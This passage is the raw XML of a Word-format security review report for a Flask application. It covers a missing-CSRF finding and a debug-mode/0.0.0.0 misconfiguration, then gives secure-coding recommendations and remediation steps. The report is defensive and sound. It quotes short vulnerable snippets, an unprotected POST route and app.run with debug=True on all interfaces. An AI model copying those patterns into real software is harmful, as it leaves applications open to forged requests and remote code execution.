        <w:t xml:space="preserve">VULN-09 — Missing CSRF Protection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FF7DA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8A6D00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</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CWE-352</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A01:2021 – Broken Access Control</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update_salary() and other POST routes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">State-changing POST endpoints accept requests with no CSRF token. If an authenticated admin visits an attacker-controlled page, that page can silently submit a form to /admin/update-salary using the admin's existing session cookie.</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@app.route("/admin/update-salary", methods=["POST"])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">def update_salary():</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # no CSRF token check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An attacker can trigger unwanted state changes (e.g. altering salary data) on behalf of a logged-in victim without their knowledge.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enable CSRF protection (Flask-WTF's CSRFProtect, or an equivalent) on all state-changing routes, include the token in every form, and set cookies with SameSite=Lax/Strict as an additional layer.</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from flask_wtf import CSRFProtect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">csrf = CSRFProtect(app)   # requires a valid token on every state-changing form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">VULN-10 — Security Misconfiguration — Debug Mode &amp; Network Binding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00"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="F2F4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:shd w:fill="FFF7DA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="8A6D00"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">CWE-489 / CWE-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="F2F4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">A05:2021 – Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="F2F4F7" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2200"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">app.py, line 134</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">debug=True enables the Werkzeug interactive debugger, which allows arbitrary Python code execution from the browser if an unhandled exception occurs and the debugger PIN is bypassed or leaked. Binding to 0.0.0.0 exposes the development server to every network interface rather than only the intended one.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerable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app.run(host="0.0.0.0", port=5000, debug=True)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remote code execution through the debugger console; unintended network exposure of a server not hardened for production traffic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Never enable debug mode in production; drive it from an environment variable that defaults to off. Run the app under a production WSGI server behind a reverse proxy rather than Flask's built-in development server, and bind only to the interfaces actually required.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Fixed code</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:bottom w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:left w:val="single" w:color="CCCCCC" w:sz="2"/>
          <w:right w:val="single" w:color="CCCCCC" w:sz="2"/>
        </w:pBdr>
        <w:shd w:fill="F5F5F5" w:val="clear"/>
        <w:spacing w:after="160" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">app.run(host="127.0.0.1", port=5000, debug=False)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve"># Production: run behind gunicorn/uWSGI + nginx, debug always off</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. General Secure Coding Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Input handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Treat all external input (form fields, query params, headers, cookies, file uploads) as untrusted, regardless of who the client claims to be.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Validate on an allowlist basis (accept known-good patterns) rather than trying to block known-bad patterns.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Data access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use parameterized queries or a vetted ORM everywhere; never build queries via string concatenation or formatting.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apply least privilege to database credentials used by the application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Authentication &amp; session management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hash passwords with bcrypt/scrypt/Argon2/PBKDF2, never a general-purpose hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Regenerate the session on login/privilege change; set cookies HttpOnly, Secure, and SameSite.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforce authorization checks server-side on every request, derived from the session — never from client-supplied identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use auto-escaping templates (Jinja2 render_template) for all HTML output; never interpolate user input into raw HTML or JavaScript.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Set security headers: Content-Security-Policy, X-Content-Type-Options, X-Frame-Options.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Secrets &amp; configuration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Keep secrets out of source control; load from environment variables or a secrets manager and rotate them.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Disable debug mode and verbose error output in any environment reachable by untrusted users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Process</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run a SAST tool (Bandit, Semgrep) and a dependency vulnerability scanner (pip-audit, Safety) in CI on every commit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Perform peer code review with a security checklist for any change touching authentication, authorization, or data access.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6. Remediation Status</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A fully corrected version of the application (fixed/app.py) is provided alongside this report. Every finding above has a corresponding, traceable fix in that file, referenced by its VULN-xx identifier in the code comments. Recommended next steps before deployment:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add automated tests that assert the vulnerable behaviors are no longer possible (e.g. an injection payload no longer returns a 200 with unexpected data).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Wire a SAST tool into the CI pipeline so regressions are caught automatically.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Conduct a follow-up review or penetration test after remediation to confirm fixes are effective and complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="320"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">7. Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The original application, while small, exhibited representative examples of the most common and highest-impact web application vulnerability classes. None of the identified issues required unusual conditions to exploit — each is directly reachable from an unauthenticated or low-privilege client. Addressing the Critical and High findings should be treated as a blocking requirement before any deployment of this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pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3A5F"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="120" w:before="240"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1F3A5F"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="100" w:before="200"/>
    </w:pPr>
    <w:rPr>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2026-07-16T16:38:04.083Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-16T16:38:04.083Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>